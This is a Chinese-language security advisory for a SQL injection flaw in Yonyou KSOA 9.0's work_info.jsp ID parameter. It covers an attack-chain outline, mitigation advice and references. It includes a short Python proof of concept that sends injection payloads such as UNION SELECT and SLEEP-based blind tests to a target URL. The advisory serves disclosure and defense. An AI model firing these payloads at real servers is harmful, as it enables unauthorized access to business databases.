CVE-2026-1122: 用友KSOA 9.0 work_info.jsp SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-1122

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

用友KSOA 9.0 (Yonyou KSOA)

漏洞概述

CVE-2026-1122是用友网络科技股份有限公司开发的企业协同办公软件KSOA 9.0版本中存在的一个高危SQL注入漏洞。该漏洞位于/worksheet/work_info.jsp文件中的HTTP GET参数处理器中，攻击者可以通过ID参数注入恶意SQL语句，从而实现对数据库的未授权访问和操作。漏洞CVSS评分为7.3，属于高危级别，攻击复杂度低，无需认证和用户交互即可远程利用。漏洞于2026年1月18日披露，目前已有公开的利用代码，厂商在收到早期通知后未做出任何回应。由于该漏洞影响的是企业级办公系统的核心文件，攻击者可能通过此漏洞获取敏感业务数据、用户信息，甚至在特定条件下实现服务器远程代码执行。建议受影响用户立即采取防护措施，避免遭受安全威胁。

技术细节

该SQL注入漏洞存在于用友KSOA 9.0的/worksheet/work_info.jsp页面中。漏洞根源在于应用程序对用户提交的ID参数缺乏有效的输入验证和SQL语句预编译处理。攻击者可以通过构造特殊的SQL payloads，如使用UNION SELECT、布尔盲注或时间盲注技术，来提取数据库中的敏感信息。漏洞影响的是HTTP GET参数处理器，攻击者可以直接通过URL参数注入恶意SQL代码。由于该系统通常部署在企业内部网络中，存储有大量机密业务数据，攻击者一旦成功利用，可能导致企业核心数据泄露、业务系统瘫痪等严重后果。此外，攻击者还可能利用获取的数据进一步横向移动，对企业IT基础设施造成更大范围的威胁。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标服务器上运行的用友KSOA 9.0系统，发现存在/worksheet/work_info.jsp端点

STEP 2

Vulnerability Detection

通过发送包含SQL注入payload的HTTP GET请求测试ID参数，验证漏洞存在

STEP 3

Data Exfiltration

利用UNION SELECT或盲注技术提取数据库中的用户凭证、业务数据等敏感信息

STEP 4

Lateral Movement

通过获取的数据进一步横向移动，可能获取服务器更高权限或访问其他关联系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-1122 PoC - Yonyou KSOA 9.0 SQL Injection
# Target: /worksheet/work_info.jsp

target_url = "http://target-server/worksheet/work_info.jsp"

# Basic SQL injection test payloads
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT NULL--",
    "1' AND SLEEP(5)--",
    "1' AND 1=1--"
]

def test_sql_injection(target, param_name='ID'):
    print(f"[*] Testing SQL Injection on {target}")
    print(f"[*] Parameter: {param_name}")
    
    for payload in payloads:
        params = {param_name: payload}
        try:
            response = requests.get(target, params=params, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"    Status: {response.status_code}")
            print(f"    Length: {len(response.text)}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with payload {payload}: {e}")

if __name__ == "__main__":
    test_sql_injection(target_url)

影响范围

用友KSOA 9.0 (所有版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用Web应用防火墙对/worksheet/work_info.jsp页面进行SQL注入规则过滤；2) 通过网络层访问控制，限制对该路径的直接访问；3) 监控数据库查询日志，及时发现异常的SQL注入行为；4) 对ID参数实施严格的输入白名单验证，仅允许数字和特定字符；5) 考虑临时禁用受影响的功能模块，待官方修复后再恢复使用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1122
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1122
3 Details https://www.cvedetails.com/cve/CVE-2026-1122/
4 VulDB https://vuldb.com/cve/CVE-2026-1122
5 Link https://github.com/LX-66-LX/cve/issues/8
6 Link https://vuldb.com/?ctiid.341714
7 Link https://vuldb.com/?id.341714
8 Link https://vuldb.com/?submit.734549